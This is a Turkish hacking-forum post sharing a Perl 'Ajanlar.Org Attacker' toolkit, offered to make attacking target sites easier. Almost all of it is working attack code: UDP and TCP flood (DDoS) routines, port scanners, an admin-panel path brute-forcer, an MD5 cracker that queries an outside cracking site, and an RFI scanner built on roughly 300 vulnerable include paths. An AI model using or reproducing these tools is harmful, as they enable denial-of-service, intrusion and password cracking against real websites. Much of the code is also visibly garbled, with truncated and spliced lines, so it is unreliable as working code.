Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Hedef Site Attacker
#1
Hedef Site Yaparken işinizi kolaylaştıracak bir script (:


PHP Kod:
#!/usr/bin/perl
use IO::Socket;

Mainmenu:

print 
q{

##########################################
## Ajanlar.Org Attacker ##
## ##
## Fanetsa ##
##########################################

1. Tarama Araclari [Scanning Tools]
2. Saldiri Araclari [Attacking Tools]
3. Kriptografi Araclari [Cracking Tools]

0. Exit

};

#vars
my $mainmenu1;
my $host;
my $port;
my $sock;
my $size;
my $yy;
################
my $target;
my $port2;
my $msg;
my $times;
my $sock1;
my $yy2;
################
my $IPA;
my $PS;
my $PE;
my $port3;
my $sock2;
my $yy3;
################
my $IPA2;
my $PS2;
my $PE2;
my $port4;
my $sock4;
my $yy4;
my $string;
my $attack;
my $i;

$mainmenu1 = ;

if (
$mainmenu1 == 1) {&menu2}
if (
$mainmenu1 == 2) {&menu3}
if (
$mainmenu1 == 3) {&menu4}

if (
$mainmenu1 == 11) {die "SpyHatz Attackeri kullandiginiz icin tesekkurler ! / spyhatz.com";}

sub menu2 {
system('clear');
print 
q{

##########################################
## Ajanlar.Org Attacker ##
## ##
## Fanetsa ##
##########################################

1. Acik TCP portlarini tara [Scan For Open TCP Ports]
2. Acik UDP portlarini tara [Scan For Open UDP Ports]
3. Admin Paneli Bul WebSite Admin Finder ]
4. Sql kolon bul SQL Column Finder ]
5. RFI Tarayici RFI Scanner ]
6. LFI Tarayici LFI Scanner ]
7. SQL Tarayici SQL Scanner ]
8. XSS Tarayici XSS Scanner ]
0. Ana menuye don Back To Main Menu ]

};

$menu2 = ;

if (
$menu2 == 1) {&portscantcp}
if (
$menu2 == 2) {&portscanudp}
if (
$menu2 == 3) {&admin_finder}
if (
$menu2 == 4) {&sqlfinder}
if (
$menu2 == 5) {&rfi_scanner}
if (
$menu2 == 6) {&lfi_scanner}
if (
$menu2 == 7) {&sql_scanner}
if (
$menu2 == 8) {&xss_scanner}
if (
$menu2 == 9) {&vb_finder}
if (
$menu2 == 0) {goto Mainmenu}

}
sub menu3 {
system('clear');
print 
q{

##########################################
## Ajanlar.Org Attacker ##
## ##
## Fanetsa ##
##########################################

1. DDoS UDP 2. DDoS TCP

0. Ana menuye don 
Back To Main Menu ]

};

$menu3 = ;

if (
$menu3 == 1) {&ddosudp}
if (
$menu3 == 2) {&ddostcp}
if (
$menu3 == 0) {goto Mainmenu}
}

sub menu4 {
system('clear');
print 
q{

##########################################
## Ajanlar.Org Attacker ##
## ##
## Fanetsa ##
##########################################

1. MD5 KIR [MD5 CRACKER]

0. Ana menuye don Back To Main Menu ]

};

$menu4 = ;

if (
$menu4 == 1) {&md5_cracker}
if (
$menu4 == 0) {goto Mainmenu}
}

sub ddosudp { print q{

###########################################
## DDoS - UDP ##
###########################################

};

print 
"Sunucu/IP Adresi : [Host/IP Address:] -;
chop (
$host = );
print "
Port: -;
chop ($port = );

{
$sock IO::Socket::INET->new (
PeerAddr => $host,
PeerPort => $port,
Proto => 'udp') || die -$! Ip adresinin dogru oldugundan emin olun [Make sure the IP/host or port number is correct]-;
}
packets:
while (
1) {
$size rand() * 200 2000;
print (
"Saldiri Basladi [ Start Flood ] : $host:$port saldiri boyutu [packet size]: $size\n");
send($sock0$size);

print 
q{

};print 
"Menuye donmen icin Y`ye basin. [Press The Y Key To Return To Menu]\n";
$yy = ;
if (
$yy == "y") {goto Mainmenu;} }

}

sub ddostcp {

print 
q{

###########################################
## DDoS - TCP ##
###########################################

};

print 
"Sunucu/Ip Adresi [Host/IP Address] : \n> -;
$target = ;
chop (
$target);
if (
$target eq --) {
die "
Giris Gecersiz ! [Invalid Input!]\n";
}
print "
Port :\n> -;
$port2 = ;
chop ($port2);
if (
$port2 eq --) {
die 
"Giris Gecersiz ! [Invalid Input!]\n";
}
print 
"Tcp Saldirisi : [Times to repeat TCP flood :]\n> -;
$times = ;
chop (
$times);
if (
$times eq --) {
die "
Giris Gecersiz! [Invalid Input]!\n";
}
print "
Enter message to send [enter for default] :\n> -;
$msg = ;
chop ($msg);
if (
$msg eq --) {
$msg "Denied. No service for you! None!\n";
}
print -[+] 
Checking if host exists...\n";
$string = inet_aton($target) || die -[+] Host not exists...?\n";

print -[+] 
Ok$target it seems to exist...\n";
print -[+] Connecting to 
$target through port: $port...\n";
$sock1 IO::Socket::INET -> new (
PeerAddr => $target,
PeerPort => $port2,
Proto => "tcp",
Type => SOCK_STREAM,
) || die -[+] 
Can't Connect to $target in $port...\n";
close($sock1);
print -[+] Ok. Port $port it seems to be connectable...\n";
print -[+] Send the attack (y/n) ?\n";
$attack = ;
chop ($attack);
if ($attack eq "n") {
die -[+] Program Exiting...\n";
} elsif ($attack eq "y") {
&attack;
} else {
die -[+] No Such Option...\n";
}

sub attack {
print -[+] Ok. Let'
s fuck him...\n";
print -[+] Attacking 
$target on port $port\n";
for (
$i 0$i new (
PeerAddr => $target,
PeerPort => $port2,
Proto => "tcp",
Type => SOCK_STREAM,
) || die -[+] 
Can't Connect...\n";
print $sock2 "msg";
close($sock2);
}
}
print -[+] Attack Completed...\n";
print "Press The Y Key To Return To Menu\n";
$yy2 = ;
if ($yy2 == "y") {goto Mainmenu;} }

sub portscantcp {

print q{

###########################################
## PORT SCAN - TCP ##
###########################################

};
print "Hedef Site / Ip adresi : -;
$hostip1 = ;
chomp ($hostip1);

print -\nFirst Port: -;
$firstport1 = ;
chomp ($firstport1);

print -\nLast Port: -;
$lastport1 = ;
chomp ($lastport1);

if($firstport1 > $lastport1){
print "Error: min port is higher then max port\n";
&portscantcp;

}
my $i5 = $firstport1;
print "Ports to scan: $i5 - $lastport1\n\n";

while ($i5 new(PeerAddr=>$hostip1,PeerPort=>$i5,proto=>'
tcp',Timeout=>5);
if ($host) {print "Port $i5 is open\n";
close $host;
$i5 = $i5 + 1;}

else {
print "Port $i5 is closed\n";
close $host;
$i5 = $i5 + 1;}
}

print "Press The Y Key To Return To Menu\n";
$yy3 = ;
if ($yy3 == "y") {goto Mainmenu;}
}

sub portscanudp {

print q{

###########################################
## PORT SCAN - UDP ##
###########################################

};

print "Target Host/IP Address: -;
$hostip2 = ;
chomp ($hostip2);

print -\nFirst Port: -;
$firstport2 = ;
chomp ($firstport2);

print -\nLast Port: -;
$lastport2 = ;
chomp ($lastport2);

if($firstport2 > $lastport2){
print "Error: min port is higher then max port\n";
&portscanudp;

}
my $i6 = $firstport2;
print "Ports to scan: $i6 - $lastport2\n\n";

while ($i6 new(PeerAddr=>$hostip2,PeerPort=>$i6,proto=>'
tcp',Timeout=>5);
if ($host2) {print "Port $i6 is open\n";
close $host2;
$i6 = $i6 + 1;}

else {
print "Port $i6 is closed\n";
close $host2;
$i6 = $i6 + 1;}
}

print "Press The Y Key To Return To Menu\n";
$yy4 = ;
if ($yy4 == "y") {goto Mainmenu;}
}

sub admin_finder {

use HTTP::Request; use LWP::UserAgent;

system('
clear');

print q{

###########################################
## ADMIN CONTROL PANEL FINDER ##
###########################################

};

print "Enter websitesite to scan: -;
$site=;
chomp $site;

print -\n";
print "Enter coding language of the website(asp, php, cfm): -;
$code=;
chomp($code);

if ( $site !~ /^http:/ ) {
$site = '
http://- . $site;
}
if ( 
$site !~ /\/$/ ) {
$site $site . -/-;
}
print -\
n";

print -[*]Target: 
$site\n";
print -[*]
WebSite Source$code\n";
print -[*]Scanning the admin control panel in progress ...\n\n\n"
;

if(
$code eq "asp"){

@
path1=('admin/-,'administrator/-,'moderator/-,'webadmin/-,'adminarea/-,'bb-admin/-,'adminLogin/-,'admin_area/-,'panel-administracion/-,'instadmin/-,
'memberadmin/-,'administratorlogin/-,'adm/-,'account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp',
'
admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html',
'
admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp',
'
bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html',
'
administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html',
'
moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html',
'
admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp',
'
administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp',
'
moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html',
'
webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html',
'
admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html',
'
panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html',
'
admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp',
'
webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp',
'
admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html',
'
panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp',
'
admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp',
'
adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html'
);

foreach $ways(@path1){

$final=$site.$ways;

my $req=HTTP::Request->new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print - \n [+] Found -> $final\n\n";
}else{
print -[-] Not Found new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print - \n [+] Found -> $final\n\n";
}else{
print -[-] Not Found new(GET=>$final);
my $ua=LWP::UserAgent->new();
$ua->timeout(30);
my $response=$ua->request($req);

if($response->content =~ /Username/ ||
$response->content =~ /Password/ ||
$response->content =~ /username/ ||
$response->content =~ /password/ ||
$response->content =~ /USERNAME/ ||
$response->content =~ /PASSWORD/ ||
$response->content =~ /Senha/ ||
$response->content =~ /senha/ ||
$response->content =~ /Personal/ ||
$response->content =~ /Usuario/ ||
$response->content =~ /Clave/ ||
$response->content =~ /Usager/ ||
$response->content =~ /usager/ ||
$response->content =~ /Sing/ ||
$response->content =~ /passe/ ||
$response->content =~ /P\/W/ ||
$response->content =~ /Admin Password/
){
print - \n [+] Found -> $final\n\n";
}else{
print -[-] Not Found -$host",
PeerPort => "80",
Proto => "tcp",
);

if(!$sock){
print - [!] Connection time out : $!\n";
return false;
}
else
{

print $sock "POST /$uri".-$md5".- HTTP/1.1\n";
print $sock "Host: $host\n";
print $sock "Referer: $host\n";
print $sock "Accept-Language: en-us\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "User-Agent: MoX-Zilla\n";
print $sock "Connection: Keep-Alive\n";
print $sock "Cache-Control: no-cache\n";
print $sock "Content-Length: $datalen\n\n";
print $sock -$pdata\n";

while ($answer = )
{
if ($answer =~ /$regexp/ )
{
print "Cracked ! \n\n\n\t";
sleep(1);
print "Plaintext is : -.$1.-\n\n\t";
print -\t[+] Tnx to $host :P Enjoy ;) \n\n";
{goto Mainmenu;}
}
}
close($sock);
}
}

print q(
Kirilacak md5 hash giriniz
Ornek : b2f3d1e0efcb5d60e259a34ecbbdbe00
Hash MD5: );
$hash=;
chomp ($hash);
unless($hash =~ /[0-9a-fA-Z]{32}/) {die "Bu bir md5 hash degil! :-( !\n"};
print "Taraniyor ....\n";

@sites = (
["passcracking.ru",-/index.php?xD=-,"datafromuser=-,"lor=#FF0000>(.*?).*?(.*?)[^\[](.*?)<\/b"]
);

$si = 0;

foreach (@sites){
$site = $sites[$si][0];
$uri = $sites[$si][1];
$pdata = $sites[$si][2];
$regex = $sites[$si][3];
findmd5($hash,$site,$uri,$pdata,$regex);
$si++;
}

print -\n\nThis hash is was not found on the net, must brut-force :-(\n\n";
print "Press The Y Key To Return To Menu\n";
$yy3 = ;
if ($yy3 == "y") {goto Mainmenu;}
}

sub rfi_scanner {

use HTTP::Request; use LWP::UserAgent;

print q{

#################################
# RFI SCANNER #
#################################

};
print "Insert Target:(ex: http://www.target.com/)\n";
$host=;
chomp($host);
print "Scanning...\n";
$rfi1="includes/header.php?systempath=-;
$rfi2="Gallery/displayCategory.php?basepath=-;
$rfi3="index.inc.php?PATH_Includes=-;
$rfi4="nphp/nphpd.php?nphp_config[LangFile]=-;
$rfi5="include/db.php?GLOBALS[rootdp]=-;
$rfi6="ashnews.php?pathtoashnews=-;
$rfi7="ashheadlines.php?pathtoashnews=-;
$rfi8="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=-;
$rfi9="demo/includes/init.php?user_inc=-;
$rfi10="jaf/index.php?show=-;
$rfi11="inc/shows.inc.php?cutepath=-;
$rfi12="poll/admin/common.inc.php?base_path=-;
$rfi13="pollvote/pollvote.php?pollname=-;
$rfi14="sources/post.php?fil_config=-;
$rfi15="modules/My_eGallery/public/displayCategory.php?basepath=-;
$rfi16="bb_lib/checkdb.inc.php?libpach=-;
$rfi17="include/livre_include.php?no_connect=lol&chem_absolu=-;
$rfi18="index.php?from_market=Y&pageurl=-;
$rfi19="modules/mod_mainmenu.php?mosConfig_absolute_path=-;
$rfi20="pivot/modules/module_db.php?pivot_path=-;
$rfi21="modules/4nAlbum/public/displayCategory.php?basepath=-;
$rfi22="derniers_commentaires.php?rep=-;
$rfi23="modules/coppermine/themes/default/theme.php?THEME_DIR=-;
$rfi24="modules/coppermine/include/init.inc.php?CPG_M_DIR=-;
$rfi25="modules/coppermine/themes/coppercop/theme.php?THEME_DIR=-;
$rfi26="coppermine/themes/maze/theme.php?THEME_DIR=-;
$rfi28="allmylinks/include/footer.inc.php?_AMLconfig[cfg_serverpath]=-;
$rfi29="allmylinks/include/info.inc.php?_AMVconfig[cfg_serverpath]=-;
$rfi30="myPHPCalendar/admin.php?cal_dir=-;
$rfi31="agendax/addevent.inc.php?agendax_path=-;
$rfi32="modules/mod_mainmenu.php?mosConfig_absolute_path=-;
$rfi33="modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=-;
$rfi34="main.php?page=-;
$rfi35="default.php?page=-;
$rfi36="index.php?action=-;
$rfi37="index1.php?p=-;
$rfi38="index2.php?x=-;
$rfi39="index2.php?content=-;
$rfi40="index.php?conteudo=-;
$rfi41="index.php?cat=-;
$rfi42="include/new-visitor.inc.php?lvc_include_dir=-;
$rfi43="modules/agendax/addevent.inc.php?agendax_path=-;
$rfi44="shoutbox/expanded.php?conf=-;
$rfi45="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=-;
$rfi46="pivot/modules/module_db.php?pivot_path=-;
$rfi47="library/editor/editor.php?root=-;
$rfi48="library/lib.php?root=-;
$rfi49="e107/e107_handlers/secure_img_render.php?p=-;
$rfi50="zentrack/index.php?configFile=-;
$rfi51="main.php?x=-;
$rfi52="becommunity/community/index.php?pageurl=-;
$rfi53="GradeMap/index.php?page=-;
$rfi54="phpopenchat/contrib/yabbse/poc.php?sourcedir=-;
$rfi55="calendar/calendar.php?serverPath=-;
$rfi56="calendar/functions/popup.php?serverPath=-;
$rfi57="calendar/events/header.inc.php?serverPath=-;
$rfi58="calendar/events/datePicker.php?serverPath=-;
$rfi59="calendar/setup/setupSQL.php?serverPath=-;
$rfi60="calendar/setup/header.inc.php?serverPath=-;
$rfi61="mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=-;
$rfi62="zentrack/index.php?configFile=-;
$rfi63="pivot/modules/module_db.php?pivot_path=-;
$rfi64="inc/header.php/step_one.php?server_inc=-;
$rfi65="install/index.php?lng=../../include/main.inc&G_PATH=-;
$rfi66="inc/pipe.php?HCL_path=-;
$rfi67="include/write.php?dir=-;
$rfi68="include/new-visitor.inc.php?lvc_include_dir=-;
$rfi69="includes/header.php?systempath=-;
$rfi70="support/mailling/maillist/inc/initdb.php?absolute_path=-;
$rfi71="coppercop/theme.php?THEME_DIR=-;
$rfi72="zentrack/index.php?configFile=-;
$rfi73="pivot/modules/module_db.php?pivot_path=-;
$rfi74="inc/header.php/step_one.php?server_inc=-;
$rfi75="install/index.php?lng=../../include/main.inc&G_PATH=-;
$rfi76="inc/pipe.php?HCL_path=-;
$rfi77="include/write.php?dir=-;
$rfi78="include/new-visitor.inc.php?lvc_include_dir=-;
$rfi79="includes/header.php?systempath=-;
$rfi80="support/mailling/maillist/inc/initdb.php?absolute_path=-;
$rfi81="coppercop/theme.php?THEME_DIR=-;
$rfi82="becommunity/community/index.php?pageurl=-;
$rfi83="shoutbox/expanded.php?conf=-;
$rfi84="agendax/addevent.inc.php?agendax_path=-;
$rfi85="myPHPCalendar/admin.php?cal_dir=-;
$rfi86="yabbse/Sources/Packages.php?sourcedir=-;
$rfi87="dotproject/modules/projects/addedit.php?root_dir=-;
$rfi88="dotproject/modules/projects/view.php?root_dir=-;
$rfi89="dotproject/modules/projects/vw_files.php?root_dir=-;
$rfi90="dotproject/modules/tasks/addedit.php?root_dir=-;
$rfi91="dotproject/modules/tasks/viewgantt.php?root_dir=-;
$rfi92="My_eGallery/public/displayCategory.php?basepath=-;
$rfi93="modules/My_eGallery/public/displayCategory.php?basepath=-;
$rfi94="modules/4nAlbum/public/displayCategory.php?basepath=-;
$rfi95="modules/coppermine/themes/default/theme.php?THEME_DIR=-;
$rfi96="modules/agendax/addevent.inc.php?agendax_path=-;
$rfi97="modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=-;
$rfi98="modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=-;
$rfi99="modules/coppermine/include/init.inc.php?CPG_M_DIR=-;
$rfi100="modules/mod_mainmenu.php?mosConfig_absolute_path=-;
$rfi101="shoutbox/expanded.php?conf=-;
$rfi102="pivot/modules/module_db.php?pivot_path=-;
$rfi103="library/editor/editor.php?root=-;
$rfi104="library/lib.php?root=-;
$rfi105="e107/e107_handlers/secure_img_render.php?p=-;
$rfi106="main.php?x=-;
$rfi107="main.php?page=-;
$rfi108="index.php?meio.php=-;
$rfi109="index.php?include=-;
$rfi110="index.php?inc=-;
$rfi111="index.php?page=-;
$rfi112="index.php?pag=-;
$rfi113="index.php?p=-;
$rfi114="index.php?x=-;
$rfi115="index.php?open=-;
$rfi116="index.php?visualizar=-;
$rfi117="index.php?pagina=-;
$rfi118="index2.php?content=-;
$rfi119="inc/step_one_tables.php?server_inc=-;
$rfi120="GradeMap/index.php?page=-;
$rfi121="phpshop/index.php?base_dir=-;
$rfi122="admin.php?cal_dir=-;
$rfi123="contacts.php?cal_dir=-;
$rfi124="convert-date.php?cal_dir=-;
$rfi125="album_portal.php?phpbb_root_path=-;
$rfi126="mainfile.php?MAIN_PATH=-;
$rfi127="dotproject/modules/files/index_table.php?root_dir=-;
$rfi128="html/affich.php?base=-;
$rfi129="gallery/init.php?HTTP_POST_VARS=-;
$rfi130="pm/lib.inc.php?pm_path=-;
$rfi131="ideabox/include.php?gorumDir=-;
$rfi132="index2.php?includes_dir=-;
$rfi133="forums/toplist.php?phpbb_root_path=-;
$rfi134="forum/toplist.php?phpbb_root_path=-;
$rfi135="admin/config_settings.tpl.php?include_path=-;
$rfi136="include/common.php?include_path=-;
$rfi137="event/index.php?page=-;
$rfi138="forum/index.php?includeFooter=-;
$rfi139="forums/index.php?includeFooter=-;
$rfi140="forum/bb_admin.php?includeFooter=-;
$rfi141="forums/bb_admin.php?includeFooter=-;
$rfi142="language/lang_english/lang_activity.php?phpbb_root_path=-;
$rfi143="forum/language/lang_english/lang_activity.php?phpbb_root_path=-;
$rfi144="blend_data/blend_common.php?phpbb_root_path=-;
$rfi145="master.php?root_path=-;
$rfi146="includes/kb_constants.php?module_root_path=-;
$rfi147="forum/includes/kb_constants.php?module_root_path=-;
$rfi148="forums/includes/kb_constants.php?module_root_path=-;
$rfi149="classes/adodbt/sql.php?classes_dir=-;
$rfi150="agenda.php3?rootagenda=-;
$rfi151="agenda2.php3?rootagenda=-;
$rfi152="sources/lostpw.php?CONFIG[path]=-;
$rfi153="topsites/sources/lostpw.php?CONFIG[path]=-;
$rfi154="toplist/sources/lostpw.php?CONFIG[path]=-;
$rfi155="sources/join.php?CONFIG[path]=-;
$rfi156="topsites/sources/join.php?CONFIG[path]=-;
$rfi157="toplist/sources/join.php?CONFIG[path]=-;
$rfi158="topsite/sources/join.php?CONFIG[path]=-;
$rfi159="public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=-;
$rfi160="extras/poll/poll.php?file_newsportal=-;
$rfi161="index.php?site_path=-;
$rfi162="mail/index.php?site_path=-;
$rfi163="fclick/show.php?path=-;
$rfi164="show.php?path=-;
$rfi165="calogic/reconfig.php?GLOBALS[CLPath]=-;
$rfi166="eshow.php?Config_rootdir=-;
$rfi167="auction/auction_common.php?phpbb_root_path=-;
$rfi168="index.php?inc_dir=-;
$rfi169="calendar/index.php?inc_dir=-;
$rfi170="modules/TotalCalendar/index.php?inc_dir=-;
$rfi171="modules/calendar/index.php?inc_dir=-;
$rfi172="calendar/embed/day.php?path=-;
$rfi173="ACalendar/embed/day.php?path=-;
$rfi174="calendar/add_event.php?inc_dir=-;
$rfi175="claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=-;
$rfi176="claroline/auth/ldap/authldap.php?includePath=-;
$rfi177="docebo/modules/credits/help.php?lang=-;
$rfi178="modules/credits/help.php?lang=-;
$rfi179="config.php?returnpath=-;
$rfi180="editsite.php?returnpath=-;
$rfi181="in.php?returnpath=-;
$rfi182="addsite.php?returnpath=-;
$rfi183="includes/pafiledb_constants.php?module_root_path=-;
$rfi184="phpBB/includes/pafiledb_constants.php?module_root_path=-;
$rfi185="pafiledb/includes/pafiledb_constants.php?module_root_path=-;
$rfi186="auth/auth.php?phpbb_root_path=-;
$rfi187="auth/auth_phpbb/phpbb_root_path=-;
$rfi188="apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=-;
$rfi189="apc-aa/cached.php3?GLOBALS[AA_INC_PATH]=-;
$rfi190="infusions/last_seen_users_panel/last_seen_users_panel.php?settings[locale]=-;
$rfi191="phpdig/includes/config.php?relative_script_path=-;
$rfi192="includes/phpdig/includes/config.php?relative_script_path=-;
$rfi193="includes/dbal.php?eqdkp_root_path=-;
$rfi194="eqdkp/includes/dbal.php?eqdkp_root_path=-;
$rfi195="dkp/includes/dbal.php?eqdkp_root_path=-;
$rfi196="include/SQuery/gameSpy2.php?libpath=-;
$rfi197="include/global.php?GLOBALS[includeBit]=-;
$rfi198="topsites/config.php?returnpath=-;
$rfi199="manager/frontinc/prepend.php?_PX_config[manager_path]=-;
$rfi200="ubbthreads/addpost_newpoll.php?addpoll=thispath=-;
$rfi201="forum/addpost_newpoll.php?thispath=-;
$rfi202="forums/addpost_newpoll.php?thispath=-;
$rfi203="ubbthreads/ubbt.inc.php?thispath=-;
$rfi204="forums/ubbt.inc.php?thispath=-;
$rfi205="forum/ubbt.inc.php?thispath=-;
$rfi206="forum/admin/addentry.php?phpbb_root_path=-;
$rfi207="admin/addentry.php?phpbb_root_path=-;
$rfi208="index.php?f=-;
$rfi209="index.php?act=-;
$rfi210="ipchat.php?root_path=-;
$rfi211="includes/orderSuccess.inc.php?glob[rootDir]=-;
$rfi212="stats.php?dir[func]=dir[base]=-;
$rfi213="ladder/stats.php?dir[base]=-;
$rfi214="ladders/stats.php?dir[base]=-;
$rfi215="sphider/admin/configset.php?settings_dir=-;
$rfi216="admin/configset.php?settings_dir=-;
$rfi217="vwar/admin/admin.php?vwar_root=-;
$rfi218="modules/vwar/admin/admin.php?vwar_root=-;
$rfi219="modules/vWar_Account/includes/get_header.php?vwar_root=-;
$rfi220="modules/vWar_Account/includes/functions_common.php?vwar_root2=-;
$rfi221="sphider/admin/configset.php?settings_dir=-;
$rfi222="admin/configset.php?settings_dir=-;
$rfi223="impex/ImpExData.php?systempath=-;
$rfi224="forum/impex/ImpExData.php?systempath=-;
$rfi225="forums/impex/ImpExData.php?systempath=-;
$rfi226="application.php?base_path=-;
$rfi227="index.php?theme_path=-;
$rfi228="become_editor.php?theme_path=-;
$rfi229="add.php?theme_path=-;
$rfi230="bad_link.php?theme_path=-;
$rfi231="browse.php?theme_path=-;
$rfi232="detail.php?theme_path=-;
$rfi233="fav.php?theme_path=-;
$rfi234="get_rated.php?theme_path=-;
$rfi235="login.php?theme_path=-;
$rfi236="mailing_list.php?theme_path=-;
$rfi237="new.php?theme_path=-;
$rfi238="modify.php?theme_path=-;
$rfi239="pick.php?theme_path=-;
$rfi240="power_search.php?theme_path=-;
$rfi241="rating.php?theme_path=-;
$rfi242="register.php?theme_path=-;
$rfi243="review.php?theme_path=-;
$rfi244="rss.php?theme_path=-;
$rfi245="search.php?theme_path=-;
$rfi246="send_pwd.php?theme_path=-;
$rfi247="sendmail.php?theme_path=-;
$rfi248="tell_friend.php?theme_path=-;
$rfi249="top_rated.php?theme_path=-;
$rfi250="user_detail.php?theme_path=-;
$rfi251="user_search.php?theme_path=-;
$rfi252="invoice.php?base_path=-;
$rfi253="cgi-bin//classes/adodbt/sql.php?classes_dir=-;
$rfi254="cgi-bin/install/index.php?G_PATH=-;
$rfi255="cgi-bin/include/print_category.php?dir=-;
$rfi256="includes/class_template.php?quezza_root_path=-;
$rfi257="bazar/classified_right.php?language_dir=-;
$rfi258="classified_right.php?language_dir=-;
$rfi259="phpBazar/classified_right.php?language_dir=-;
$rfi260="chat/messagesL.php3?cmd=-;
$rfi261="phpMyChat/chat/messagesL.php3?cmd=-;
$rfi262="bbs/include/write.php?dir=-;
$rfi263="visitorupload.php?cmd=-;
$rfi264="modules/center/admin/accounts/process.php?module_path]=-;
$rfi265="index.php?template=-;
$rfi266="armygame.php?libpath=-;
$rfi267="lire.php?rub=-;
$rfi268="pathofhostadmin/?page=-;
$rfi269="apa_phpinclude.inc.php?apa_module_basedir=-;
$rfi270="index.php?req_path=-;
$rfi271="research/boards/encapsbb-0.3.2_fixed/index_header.php?root=-;
$rfi272="Farsi1/index.php?archive=-;
$rfi273="index.php?archive=-;
$rfi274="show_archives.php?template=-;
$rfi275="forum/include/common.php?pun_root=-;
$rfi276="pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=-;
$rfi277="vuln.php?=-;
$rfi278="cgi-bin//include/write.php?dir=-;
$rfi279="admin/common.inc.php?basepath=-;
$rfi280="pm/lib.inc.php?sfx=-;
$rfi281="pm/lib.inc.php?pm_path=-;
$rfi282="artmedic-kleinanzeigen-path/index.php?id=-;
$rfi283="osticket/include/main.php?include_dir=-;
$rfi284="include/main.php?config[search_disp]=include_dir=-;
$rfi285="phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=-;
$rfi286="quick_reply.php?phpbb_root_path=-;
$rfi287="zboard/include/write.php?dir=-;
$rfi288="admin/plog-admin-functions.php?configbasedir=-;
$rfi289="content.php?content=-;
$rfi290="q-news.php?id=-;
$rfi291="_conf/core/common-tpl-vars.php?confdir=-;
$rfi292="votebox.php?VoteBoxPath=-;
$rfi293="al_initialize.php?alpath=-;
$rfi294="include/db.php?GLOBALS[rootdp]=-;
$rfi295="modules/news/archivednews.php?GLOBALS[language_home]=-;
$rfi296="protection.php?siteurl=-;
$rfi297="modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=-;
$rfi298="index2.php?includes_dir=-;
$rfi299="classes.php?LOCAL_PATH=-;
$rfi300="extensions/moblog/moblog_lib.php?basedir=-;
$rfi301="modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=-;
$rfi302="phpWebLog/include/init.inc.php?G_PATH=-;
$rfi303="admin/objects.inc.php4?Server=-;
$rfi304="trg_news30/trgnews/install/article.php?dir=-;
$rfi305="block.php?Include=-;
$rfi306="arpuivo.php?data=-;
$rfi307="setup/index.php?GALLERY_BASEDIR=-;
$rfi308="include/help.php?base=-;
$rfi309="index.php?[Home]=-;
$rfi310="block.php?Include=-;
$rfi311="examples/phonebook.php?page=-;
